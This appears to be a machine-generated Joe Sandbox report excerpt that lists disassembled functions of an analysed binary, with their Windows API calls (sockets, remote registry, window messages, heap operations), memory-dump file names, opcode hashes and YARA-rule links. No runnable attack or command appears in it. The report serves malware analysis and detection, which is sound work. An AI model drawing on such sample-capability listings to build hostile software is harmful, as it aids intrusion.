                                                                                                                                                                                                                                                                                                        • API ID: CreateHandlePipe
                                                                                                                                                                                                                                                                                                        • String ID: nul
                                                                                                                                                                                                                                                                                                        • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                                                                                        • Opcode ID: 55cf940ae49861db09e898df378b31854141c48c3ccd7af25d99da12165cc793
                                                                                                                                                                                                                                                                                                        • Instruction ID: 9f25716a3b978e5439644e86a2ba2148b92b14ba3c89e56cea787a59c45d0538
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 55cf940ae49861db09e898df378b31854141c48c3ccd7af25d99da12165cc793
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE21A07464031AABDB609F68C944E9A7BE8BF54320F200A58FDE4D72D8D770D440CB10
                                                                                                                                                                                                                                                                                                        Function 01044B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FB78B1
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: GetStockObject.GDI32(00000011), ref: 00FB78C5
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB78CF
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 01044BB0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 01044BBD
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 01044BC8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 01044BD7
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 01044BE3
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                                                                        • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                                                                        • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                                                                        • Opcode ID: 74caee7ddab1903a53f8f637beccf75cf02186d9108e3ad8c6ddffc735f612c6
                                                                                                                                                                                                                                                                                                        • Instruction ID: b82f720331fc4802b6f70272c3a26416db05012dd8ed2aabe2617aa886b722c1
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 74caee7ddab1903a53f8f637beccf75cf02186d9108e3ad8c6ddffc735f612c6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F1193B1550219BFEF119EA5CC85EEB7F9DEF08758F018111B648E6050C6769C21DBA4
                                                                                                                                                                                                                                                                                                        Function 00FEDB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FEDB23: _free.LIBCMT ref: 00FEDB4C
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDBAD
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4), ref: 00FE2D4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE2D38: GetLastError.KERNEL32(01081DC4,?,00FEDB51,01081DC4,00000000,01081DC4,00000000,?,00FEDB78,01081DC4,00000007,01081DC4,?,00FEDF75,01081DC4,01081DC4), ref: 00FE2D60
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDBB8
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDBC3
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDC17
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDC22
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDC2D
                                                                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00FEDC38
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                        • Instruction ID: b07c097780ce36f49b177997ca01a4ef1b64b965cd1422288e824d941b3a3de2
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90116372541B88BAD530BBB2CC47FCBB7DC9F84700F410C19B299AA552EB7DB514A750
                                                                                                                                                                                                                                                                                                        Function 0101E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0101E328
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 0101E32F
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0101E345
                                                                                                                                                                                                                                                                                                        • LoadStringW.USER32(00000000), ref: 0101E34C
                                                                                                                                                                                                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0101E390
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 0101E36D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                        • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                                                                                        • Opcode ID: 08694d72f2971b727f2bf367ce6f7d1af10bbfbb100e78b5e8d5decbbdb673a4
                                                                                                                                                                                                                                                                                                        • Instruction ID: e12f7a4f0748898b6b1f23a6587d09b43cad3ea97409970de6d25d898237c329
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 08694d72f2971b727f2bf367ce6f7d1af10bbfbb100e78b5e8d5decbbdb673a4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 000162F6900208BFE72197E4DDC9EEB776CD708300F004595BB85E6045EA789E848B75
                                                                                                                                                                                                                                                                                                        Function 01021312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 01021322
                                                                                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00000000,?), ref: 01021334
                                                                                                                                                                                                                                                                                                        • TerminateThread.KERNEL32(00000000,000001F6), ref: 01021342
                                                                                                                                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 01021350
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0102135F
                                                                                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0102136F
                                                                                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00000000), ref: 01021376
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3495660284-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8207810d6e8f00ffb3c144f2f7cb1db933a50168f1931bb9b7fe2a1620203b27
                                                                                                                                                                                                                                                                                                        • Instruction ID: eb0149f5b0ac3dfebfe415e9a802f30eb99cf324f83f14418a3875bf33303c37
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8207810d6e8f00ffb3c144f2f7cb1db933a50168f1931bb9b7fe2a1620203b27
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91F03CB6042612BBD3611F94EF89BC6BB7AFF24312F405021F241918A4877AD071CF90
                                                                                                                                                                                                                                                                                                        Function 010326BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 0103281D
                                                                                                                                                                                                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 0103283E
                                                                                                                                                                                                                                                                                                        • WSAGetLastError.WSOCK32 ref: 0103284F
                                                                                                                                                                                                                                                                                                        • htons.WSOCK32(?,?,?,?,?), ref: 01032938
                                                                                                                                                                                                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 010328E9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101433E: _strlen.LIBCMT ref: 01014348
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01033C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0102F669), ref: 01033C9D
                                                                                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 01032992
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3203458085-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: e5e14fc1e5d987c63f8ae0f5171ddc5982ca8dfcb858f36b63271ca2397eb9a4
                                                                                                                                                                                                                                                                                                        • Instruction ID: 655baa673ba9f0184ba24c4dcacc0c21280fbb394a5f6c397f53aac25499f5e7
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5e14fc1e5d987c63f8ae0f5171ddc5982ca8dfcb858f36b63271ca2397eb9a4
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78B10035604301AFD321DF28C885F6ABBE9BF84318F54858CF5964B2A2DB35ED42CB91
                                                                                                                                                                                                                                                                                                        Function 00FE0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00FE042A
                                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE0446
                                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00FE045D
                                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE047B
                                                                                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 00FE0492
                                                                                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FE04B0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                        • Instruction ID: 58b01284f10395bb09e498e6749446a0cb0739cc62bf22c07dbf5f3c2886ec88
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5681E772A0074A9FE720DF6ACC81B6A73A9AF44334F24412AF511D66C1EFF4D981A794
                                                                                                                                                                                                                                                                                                        Function 00FE6571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00FD8649,00FD8649,?,?,?,00FE67C2,00000001,00000001,8BE85006), ref: 00FE65CB
                                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00FE67C2,00000001,00000001,8BE85006,?,?,?), ref: 00FE6651
                                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00FE674B
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FE6758
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FE3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00FD6A79,?,0000015D,?,?,?,?,00FD85B0,000000FF,00000000,?,?), ref: 00FE3BC5
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FE6761
                                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00FE6786
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1414292761-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 7ef3e65c928e8966e721b73b0d9a76ca49c6a0672ccc1d88911d65ab22de4075
                                                                                                                                                                                                                                                                                                        • Instruction ID: 566eb7b3fa32a73aa04df55ce4083616abf9e347b37bad917264ea6737497176
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ef3e65c928e8966e721b73b0d9a76ca49c6a0672ccc1d88911d65ab22de4075
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4512872A1028AAFDB244E66CC85FBF77A9EF607A4F140269FC14D7140EF35DC40A650
                                                                                                                                                                                                                                                                                                        Function 0103C63B Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103C10E,?,?), ref: 0103D415
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D451
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4C8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4FE
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C72A
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0103C785
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103C7CA
                                                                                                                                                                                                                                                                                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0103C7F9
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0103C853
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0103C85F
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1120388591-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bbba369a66c7f87c1bc61f1ebe640df21efcddc56741246ff9948327de8a0c1a
                                                                                                                                                                                                                                                                                                        • Instruction ID: b3c73ce7eb64b29e7271b80e3473841f1cf13f2dbac5388a86d62f477bb35d87
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bbba369a66c7f87c1bc61f1ebe640df21efcddc56741246ff9948327de8a0c1a
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D581B174208241AFE715DF24C984E6ABBE9FF84308F04849DF5959B292CB36ED06CF91
                                                                                                                                                                                                                                                                                                        Function 0101009D Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(00000035), ref: 010100A9
                                                                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 01010150
                                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(01010354,00000000), ref: 01010179
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(01010354), ref: 0101019D
                                                                                                                                                                                                                                                                                                        • VariantCopy.OLEAUT32(01010354,00000000), ref: 010101A1
                                                                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 010101AB
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3859894641-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: a2910867032f59c9ba58091ee41cc495b50b5e69c3cb61053b6f28ba970b9b76
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e5374068cb4b4ff9878b2790bce35f90c5bd29d96de37fc1fb3311a70834e52
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2910867032f59c9ba58091ee41cc495b50b5e69c3cb61053b6f28ba970b9b76
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2151D675600321ABDF20AB649885BADB3A5AF56310F148447F9C6DF29EDB7C9880CB91
                                                                                                                                                                                                                                                                                                        Function 01029B51 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB41EA: _wcslen.LIBCMT ref: 00FB41EF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB8577: _wcslen.LIBCMT ref: 00FB858A
                                                                                                                                                                                                                                                                                                        • GetOpenFileNameW.COMDLG32(00000058), ref: 01029F2A
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01029F4B
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 01029F72
                                                                                                                                                                                                                                                                                                        • GetSaveFileNameW.COMDLG32(00000058), ref: 01029FCA
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
